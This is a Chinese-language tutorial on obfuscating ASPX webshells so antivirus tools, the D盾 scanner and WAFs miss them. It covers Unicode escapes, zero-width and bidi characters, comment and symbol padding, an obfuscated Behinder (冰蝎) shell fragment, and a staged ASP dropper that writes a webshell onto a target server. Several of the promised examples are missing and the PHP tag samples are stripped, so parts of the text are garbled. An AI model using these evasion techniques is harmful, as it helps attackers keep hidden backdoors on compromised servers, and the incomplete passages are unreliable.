其中aspx类型中,我们可以利用下面列出的这些特性对内容作对应的处理,以达到免杀的目的
1、unicode编码2、空字符串连接3、截断3、头部替换5、特殊符号@6、注释
1.unicode编码
例如"eval"他可以变为\u0065\u0076\u0061\u006C
那么如下例子可以转换为:
在JScript的情况下它不支持大U和多个0的增加,但是在c#的情况下,是可以支持大U和多个0的增加。
2、空字符串连接
unicode是支持在aspx里进行的,同样的,它也支持asmx和ashx,估计这类特性都是通用的。并且在unicode有一类字符叫做零宽连字符(全称zero width joiner)。
在函数字符串中插入这些字符都不会影响脚本的正常运行,在测试前需要注意该类字符插入的位置,否则插入错误的地方会产生报错。
除了上面的zero width joiner,还有一种unicode编码叫做零宽不折行空格,也就是如下几种字符,都支持在字符间进行拼接
\ufeff\u202a\u202b\u202c\u202d\u202e
例子:
3、使用语法
将整个字符串与函数利用多个进行分割
4、头部免杀
该字段可以放在后面,不一定要放前面
5、使用符号
可以添加@符号但是不会影响其解析
6、注释插入
7、花括号和分号
{}和分号;在原本语法结束的地方可以添加大量的该类混淆,不会影响其原本的解析
8、aspx别的声明标签
在php中,解析引擎可以认识
1、XML标记风格echo "XML 标记风格";?>2、脚本风格echo "脚本风格";3、简短标记风格echo "简短标记风格";?>注意php.ini中的short_open_tag 选项必须为on4、ASP标记风格echo '这是asp标记风格'%>注意php.ini中的asp_tags 选项必须为on
aspx中也有类似的标签风格
void page_load(){Response.Write("hello");}
9、换行特性
10、c#的 ///特性和xml
c#规定了/// 能够在aspx中作为xml语法的注释,那么在实际使用中,我们结合换行、unicode特性可以这样做,在如下内容中加入///充当注释:
@language = c#%>@Import Namespace="System.Reflection"%>//////@#@!#!@#!@#!@#!@#!@#!@#"e45e329feb5d925b"); byte[]//////@#@!#!@#!@#!@#!@#!@#!@# k = Encoding.Default.GetBytes(Session[0] + ""),//////@#@!#!@#!@#!@#!@#!@#!@#c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth); //////@#@!#!@#!@#!@#!@#!@#!@#%>
那么这时我们综上所说到的这些特性,对冰蝎马进行免杀处理,得到如下内容:
同理,哥斯拉等其他的也可以按照这种方法作免杀处理。
可通过变量赋值替换,组合换行的方式进行免杀
比如常见的一句话通过变量赋值替换,即可免杀D盾
那么下面我们就可以利用这两个特性对冰蝎马进行免杀处理,同样得到如下内容:
ps:再补充一个之前在xx项目测试中,利用中间马的方式绕过waf写入webshell,大概原理就是先上传一个写文件功能的,利用该功能再往目标服务器写入webshell。
往当前目录写入TypeError.asp,文件内容为
Server.CreateObject(\"Scripting.FileSystemObject\").OpenTextFile(Server.MapPath(\"TypeError.asp\"),2,True).WriteLine(HexToStr("3c25726573706f6e73652e7772697465282268656c6c6f2229253e"))
其中我们再定义两个函数用于混淆
Function JXMD(MM):MM = Split(MM,"-")For x=0 To Ubound(MM)JXMD=JXMD&Chr(MM(x))NextEnd Function
Function HexToStr(ByRef strHex)Dim LengthDim MaxDim StrMax = Len(strHex)For Length = 1 To Max Step 2Str = Str & Chr("&h" & Mid(strHex, Length, 2))NextHexToStr = StrEnd function
ok,接下来我们再做一下数据处理
最后可以得到如下内容:
同样也是具有免杀效果的
